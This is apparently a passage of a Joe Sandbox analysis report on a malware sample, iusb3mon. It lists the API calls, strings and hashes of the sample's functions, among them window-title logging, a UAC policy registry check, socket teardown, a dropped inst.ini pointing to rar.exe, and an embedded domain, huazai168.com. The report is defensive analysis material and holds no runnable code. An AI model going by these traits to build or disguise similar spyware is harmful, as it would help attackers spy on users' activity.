Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a5d173c81f15ec06b3962ba932ae53d5aaceeb06e86ffd986dc6e5828dfa9aa1
Instruction ID: 9b77f23d18a912925acc3c9f2d56c78101e421e208ea0edf9e410da7c6602215
Opcode Fuzzy Hash: a5d173c81f15ec06b3962ba932ae53d5aaceeb06e86ffd986dc6e5828dfa9aa1
Instruction Fuzzy Hash: 27018F32904659EFDB019B50DC0AFAEBBB8FB44B10F004525E816B22D0DB749804DB90

Function 04D7892C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 04D788DD: EnterCriticalSection.KERNEL32(?,?,?,04D78958,00000005,00000005), ref: 04D788E5
Part of subcall function 04D788DD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,04D78958,00000005,00000005), ref: 04D788FD

LoadLibraryA.KERNEL32(ws2_32.dll,00000005,00000005), ref: 04D7895D
GetProcAddress.KERNEL32(00000000,closesocket), ref: 04D7896B
FreeLibrary.KERNEL32(00000000), ref: 04D7897F

Strings

closesocket, xrefs: 04D78965
ws2_32.dll, xrefs: 04D78958

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
String ID: closesocket$ws2_32.dll
API String ID: 2819327233-181964208
Opcode ID: 34f83245867493413cea1dccca8726216009e24f7d0415f786c3d0aec1692f10
Instruction ID: 7b5b0b1f80f622e6acc533b1240799a7829c745edec3eb72d1e69bf953c29280
Opcode Fuzzy Hash: 34f83245867493413cea1dccca8726216009e24f7d0415f786c3d0aec1692f10
Instruction Fuzzy Hash: CEF0B4B66002047BEB11A794EC4EEFF7FBCDB85665F010229F905D2240FAB4A904CAB1

Function 04D7386B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 04D7387D
GetSystemMetrics.USER32(00000001), ref: 04D73881
ChangeDisplaySettingsA.USER32(?,00000000), ref: 04D738B4
ChangeDisplaySettingsA.USER32(00000000,00000000), ref: 04D738C9

Strings

, xrefs: 04D73892

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ChangeDisplayMetricsSettingsSystem
String ID:
API String ID: 2205422386-3916222277
Opcode ID: f31fd10869945c612b9bf3051ce5d55f819254ce5ff05640386cd1520aba4812
Instruction ID: e043f88735fab879ed34a267e22ced5498d061cc7e77e6dad68d61f37af4db8b
Opcode Fuzzy Hash: f31fd10869945c612b9bf3051ce5d55f819254ce5ff05640386cd1520aba4812
Instruction Fuzzy Hash: 63F05471D1432CEAFB20DBA4DC05F8D7BB8AB04708F10005AA608B71C1E3F4A5048FA1

Function 04D72A15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,04D72661,c:\inst.ini), ref: 04D72A2B
WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,04D72661,c:\inst.ini), ref: 04D72A40
CloseHandle.KERNEL32(00000000,?,04D72661,c:\inst.ini), ref: 04D72A4D

Strings

c:\inst.ini, xrefs: 04D72A1B
C:\\rar.exe, xrefs: 04D72A3A

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\\rar.exe$c:\inst.ini
API String ID: 1065093856-1710477331
Opcode ID: be40cd5c95798e3fbb7f7a8236b86cff72335730f299bf96584cf722cdc93fc5
Instruction ID: ca4f103515ff57c1ccbc9d227e56ec8d6d521773ac2796cc8c3da3664a43f9c4
Opcode Fuzzy Hash: be40cd5c95798e3fbb7f7a8236b86cff72335730f299bf96584cf722cdc93fc5
Instruction Fuzzy Hash: C4E01AB22922287FFA211A61AC9AFEB7B5DEB057A8F004125FA08D5250D6659D408AA4

Function 04D77639 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,04D779A5,?,?,?), ref: 04D77642
GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 04D77654
FreeLibrary.KERNEL32(00000000), ref: 04D77676

Strings

RtlGetNtVersionNumbers, xrefs: 04D7764E
ntdll.dll, xrefs: 04D7763B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlGetNtVersionNumbers$ntdll.dll
API String ID: 145871493-1263206204
Opcode ID: 7bc481ca24673f99fdfb94e7a84c4066175c8a6455a6c081de04ffa659872936
Instruction ID: 527841249ce320ea863230a7748694197ed0424ff3d491f1d28597896fce97f7
Opcode Fuzzy Hash: 7bc481ca24673f99fdfb94e7a84c4066175c8a6455a6c081de04ffa659872936
Instruction Fuzzy Hash: E6E09232210321B7D7216B65BC49E6FBFF4EBC1FA1F05041CF900E2254DB28AC458BA2

Function 04D73AE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26sleepmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,0000046D,?,04D720A0,?,00000000,00000000,?), ref: 04D73AF1
LocalSize.KERNEL32(00000000), ref: 04D73B17
Sleep.KERNEL32(00000001,00000000,00000000), ref: 04D73B2A
LocalFree.KERNEL32(00000000), ref: 04D73B31

Strings

huazai168.com, xrefs: 04D73B05

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Local$AllocFreeSizeSleep
String ID: huazai168.com
API String ID: 1864957939-2241639779
Opcode ID: 714f62bc2c93fdddd2c6f0c6678eca3bc365d031921a5a7e7c30eee106dc5a6a
Instruction ID: 5d854be8d04e55db86a7cde94944a870e887049d849d9fc3cf835cfb6f87042c
Opcode Fuzzy Hash: 714f62bc2c93fdddd2c6f0c6678eca3bc365d031921a5a7e7c30eee106dc5a6a
Instruction Fuzzy Hash: DAE09275A016227BE2116B60FC19FEE7B9CDF0AB21F440108FB45E1280EB58A9408BA7

Function 04D774A9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,?,04D779AA,?,?,?), ref: 04D774B8
GetProcAddress.KERNEL32(00000000), ref: 04D774BF
GetCurrentProcess.KERNEL32(00000000,?,?,04D779AA,?,?), ref: 04D774D3

Strings

IsWow64Process, xrefs: 04D774AE
kernel32.dll, xrefs: 04D774B3

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: 2c38be27596e282456f418168a181bbc1db4ca0b347a8bcc241a6fffed8bbbbd
Instruction ID: cc61f2b62c303b24915a68e38f0f528594be3f3f0db638a3e3aeb70232df8bd3
Opcode Fuzzy Hash: 2c38be27596e282456f418168a181bbc1db4ca0b347a8bcc241a6fffed8bbbbd
Instruction Fuzzy Hash: 5FE01A72D51219FFCF11DBA5991DAAE7BACEB04A66F000559F501E2100E6B8EE008FA1

Function 04D71B34 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,04D71B85), ref: 04D71B47
GetProcAddress.KERNEL32(00000000), ref: 04D71B4E
GetCurrentProcess.KERNEL32(00000000,?,?,?,04D71B85), ref: 04D71B5E

Strings

IsWow64Process, xrefs: 04D71B3D
kernel32, xrefs: 04D71B42

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32
API String ID: 4190356694-3789238822
Opcode ID: b2003fe404709fda13cf05992a5388c375f185a0452522bff2d6456ac1e13d74
Instruction ID: ff69be6dc863b85a1222fcae195406ed9cb28ac50a0b9538c39f15969b7a1760
Opcode Fuzzy Hash: b2003fe404709fda13cf05992a5388c375f185a0452522bff2d6456ac1e13d74
Instruction Fuzzy Hash: 6EE0EC72961319FBCF10A7E59D1EA9E7BACEF05755F140255B501E3200D778EE048FA4

Function 04D80312 Relevance: 7.6, APIs: 5, Instructions: 150COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 04D80370
GetFileType.KERNEL32(00000480), ref: 04D8041B
GetStdHandle.KERNEL32(-000000F6), ref: 04D8047E
GetFileType.KERNEL32(00000000), ref: 04D8048C
SetHandleCount.KERNEL32 ref: 04D804C3

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 03352aa895c1c8ae27fc063c800520bed99863ca581e4f03c9698d6a0922b359
Instruction ID: 329ddbf9b082fb30a94811c0ee6f3f1404bd1ada121756d0a765225e0a8056d6
Opcode Fuzzy Hash: 03352aa895c1c8ae27fc063c800520bed99863ca581e4f03c9698d6a0922b359
Instruction Fuzzy Hash: C0510571A006018BDB22EF6CC4987797BE0FF02328F26866CD5A6DB2D2D734E809D751

Function 04D77DC3 Relevance: 7.6, APIs: 6, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00002000,00000004,00000000,?,?,?,?,?,04D736CC,?,?,?,04D720F0,?), ref: 04D77DFE
VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,04D736CC,?,?,?,04D720F0,?,04DA2BD8,?,00000000), ref: 04D77E0E
GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,04D736CC,?,?,?,04D720F0,?,04DA2BD8,?,00000000,00000000,?), ref: 04D77E1F
HeapAlloc.KERNEL32(00000000,?,?,?,04D736CC,?,?,?,04D720F0,?,04DA2BD8,?,00000000,00000000,?,?), ref: 04D77E26
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,04D736CC,?,?,?,04D720F0,?,04DA2BD8,?,00000000), ref: 04D77E4A
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,04D736CC,?,?,?,04D720F0,?,04DA2BD8,?,00000000), ref: 04D77E59

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Alloc$Virtual$Heap$Process
String ID:
API String ID: 2020977634-0
Opcode ID: 85834b2ba06debee4110a3ed7a07bb2b85fc2d35d43bb7eb3e8688903d36c484
Instruction ID: b24bfdd49707b9a3789be6159740dbb67c51a649ab52b3c384d0b75947a577de
Opcode Fuzzy Hash: 85834b2ba06debee4110a3ed7a07bb2b85fc2d35d43bb7eb3e8688903d36c484
Instruction Fuzzy Hash: 40314771600706BBEB249FA9CD85E6ABBA8FF48754F100829F605D7280E7B0FD509B64

Function 04D72B0D Relevance: 7.6, APIs: 5, Instructions: 80stringtimeCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00000000,00000258), ref: 04D72B2F
GetWindowTextA.USER32(00000000,04DA20CC,00000400), ref: 04D72B3D
lstrlenA.KERNEL32(04DA20CC), ref: 04D72B73
GetLocalTime.KERNEL32(?), ref: 04D72B81
wsprintfA.USER32 ref: 04D72BB2

Part of subcall function 04D72A59: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000,?,?), ref: 04D72A71
Part of subcall function 04D72A59: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 04D72AC4
Part of subcall function 04D72A59: GetFileSize.KERNEL32(00000000,00000000), ref: 04D72AD1
Part of subcall function 04D72A59: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 04D72AE3
Part of subcall function 04D72A59: lstrlenA.KERNEL32(04D72DCE,?,00000000), ref: 04D72AF1
Part of subcall function 04D72A59: WriteFile.KERNEL32(00000000,04D72DCE,00000000), ref: 04D72AFC
Part of subcall function 04D72A59: CloseHandle.KERNEL32(00000000), ref: 04D72B03

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Windowlstrlen$CloseCreateFolderForegroundHandleLocalPathPointerSizeSpecialTextTimeWritewsprintf
String ID:
API String ID: 3540613261-0
Opcode ID: c2ac1c0e7a5dd11fb0beb12b301db5c54800b696c31a56019d5d6b577191848b
Instruction ID: 0505bb554c9e55f13eb29f7a48bf8cbc6276c0661e331f39c5a1b8676cc875f3
Opcode Fuzzy Hash: c2ac1c0e7a5dd11fb0beb12b301db5c54800b696c31a56019d5d6b577191848b
Instruction Fuzzy Hash: 4E2150B2901119BAEB109BA9DD58FFF77BCEF49319F0040A5F604E2241E638AE44CB75

Function 04D77681 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,04D77870,00000000,00020019,04D77870,00000000,0000009C,00000000,?,?,04D77870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 04D7769D
RegQueryValueExA.ADVAPI32(04D77870,?,00000000,80000002,00000000,?,?,?,04D77870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 04D776BD
RegQueryValueExA.ADVAPI32(04D77870,?,00000000,00000000,00000000,?,?,?,04D77870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 04D776E2
RegCloseKey.ADVAPI32(04D77870,?,?,04D77870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 04D776F3
RegCloseKey.ADVAPI32(04D77870,?,?,04D77870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 04D77700

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseQueryValue$Open
String ID:
API String ID: 4082589901-0
Opcode ID: da78b7c61f6df4da17114bf886b5ba61f06821df2af4e45a9c17f6ac96f54a90
Instruction ID: a034eecf780a220c458f0abdb2757839cfe6451df16d4915f53afe2478097b9b
Opcode Fuzzy Hash: da78b7c61f6df4da17114bf886b5ba61f06821df2af4e45a9c17f6ac96f54a90
Instruction Fuzzy Hash: 2E112576200149FF9F11AF55EC88DAE3BB9FF89354B104869F914D6220EB31AE10EB60

Function 04D89DEB Relevance: 7.6, APIs: 5, Instructions: 52stringregistryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D89DF0
GetClassInfoA.USER32(?,?,?), ref: 04D89E0B
RegisterClassA.USER32(00000004), ref: 04D89E16
lstrcatA.KERNEL32(00000034,?,00000001), ref: 04D89E4D
lstrcatA.KERNEL32(00000034,?), ref: 04D89E5B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Classlstrcat$H_prologInfoRegister
String ID:
API String ID: 106226465-0
Opcode ID: 497480705663df89b9ab8f6eaefb7a0e93ba4da7afe287d1e3d163483de124af
Instruction ID: 403eb6ed6a5ca2f90e1d26dd3df1fd9158ffdd17e131b26cbd68f6a8542b4312
Opcode Fuzzy Hash: 497480705663df89b9ab8f6eaefb7a0e93ba4da7afe287d1e3d163483de124af
Instruction Fuzzy Hash: B811E1B6611318EEEB11BFA48810ABE7FB8EF15B18F00459DF845A7290D774BA00CB71

Function 04D713A5 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationnetworkCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D713AA
WaitForSingleObject.KERNEL32(?,000000FF), ref: 04D713CD
CloseHandle.KERNEL32(?), ref: 04D713E9
CloseHandle.KERNEL32(?), ref: 04D713EE
WSACleanup.WS2_32 ref: 04D713F0

Part of subcall function 04D7180D: setsockopt.WS2_32(?,0000FFFF,00000080,04D7546D,00000004), ref: 04D71832
Part of subcall function 04D7180D: CancelIo.KERNEL32(?), ref: 04D7183B
Part of subcall function 04D7180D: InterlockedExchange.KERNEL32(?,00000000), ref: 04D71847
Part of subcall function 04D7180D: closesocket.WS2_32(?), ref: 04D71850
Part of subcall function 04D7180D: SetEvent.KERNEL32(?), ref: 04D71859

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseHandle$CancelCleanupEventExchangeH_prologInterlockedObjectSingleWaitclosesocketsetsockopt
String ID:
API String ID: 1476891362-0
Opcode ID: 9b89ccd367fb66694a054385a696b3aaca1e7982d55fce5905724a321b869311
Instruction ID: ea8a23c2ba2dd7c2cd0ca321fe379013283778b4f6a8c677c99bab88a5354c47
Opcode Fuzzy Hash: 9b89ccd367fb66694a054385a696b3aaca1e7982d55fce5905724a321b869311
Instruction Fuzzy Hash: 9101A1306116A4DEE725EB64C91476EBBF4FF01768F10075CD0A2527D0DBB4BA05DB61

Function 04D7CDA1 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,04D7DE63,04D7DDE8,00000000,04D7B401,00000000,00000000,00000000,?,04D78D56,?,?,04D78CE2,?,?), ref: 04D7CDA3
TlsGetValue.KERNEL32(?,04D78D56,?,?,04D78CE2,?,?,?), ref: 04D7CDB1
SetLastError.KERNEL32(00000000,?,04D78D56,?,?,04D78CE2,?,?,?), ref: 04D7CDFD

Part of subcall function 04D8005D: HeapAlloc.KERNEL32(00000008,04D78D56,00000000,00000000,00000000,00000000,00000000,?,04D78D56,?,?,04D78CE2,?,?,?), ref: 04D80153

TlsSetValue.KERNEL32(00000000,?,04D78D56,?,?,04D78CE2,?,?,?), ref: 04D7CDD5
GetCurrentThreadId.KERNEL32 ref: 04D7CDE6

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
